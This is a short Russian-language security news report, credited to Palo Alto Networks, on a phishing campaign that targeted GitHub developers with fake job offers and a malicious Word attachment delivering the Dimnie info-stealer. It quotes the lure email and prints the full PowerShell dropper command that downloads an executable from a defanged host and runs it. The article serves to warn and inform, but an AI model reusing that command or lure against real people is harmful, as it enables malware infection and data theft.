В середине января группе исследователей стало известно о том, что некоторые разработчики получали письма с вредоносными вложениями. Владельцы аккаунтов GitHub получили письма с подобным содержанием:
Привет!
Меня зовут Адам Бахбиндер, я посмотрел твой репозиторий, и он впечатлил меня.
В моей компании есть позиция, которая как раз тебе подходит.
Пожалуйста, посмотри вложенные в письмо описания вакансии и компании.
Свяжись со мной по email, указанному в документе.
Всего хорошего,
Адам
Было получено много аналогичных вариантов сообщения, но все они содержали один и тот же вредоносный .doc-файл. В этом файле содержался код, который запускал PowerShell-скрипт. После этого происходила загрузка и запуск .exe-файла. Вот читаемая версия скрипта:
cmd.exe /c "powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('hxxp://nicklovegrove.co[.]uk/wp-content/
margin2601_onechat_word.exe','%appdata%.exe');start-process '%appdata%.exe'"
В начале зловред казался стандартным, но в процессе изучения стало понятно, что вредоносный код, который вызывается в результате исполнения скрипта, достаточно известен в сфере кибербезопасности. Вирус, известный как Dimnie, внедряется в основные процессы операционной системы для кражи информации. Изначально данная технология была ориентирована на заражение российских пользователей, но за 3 года (впервые разновидность этого вируса была обнаружена в 2014 году) он «мутировал», став более скрытным и распространившись за пределы России.
Подробности о схеме работы Dimnie можно прочитать в отчёте команды Unit 42, обратившей внимание на эту волну фишинговых писем.
Источник: Palo Alto Networks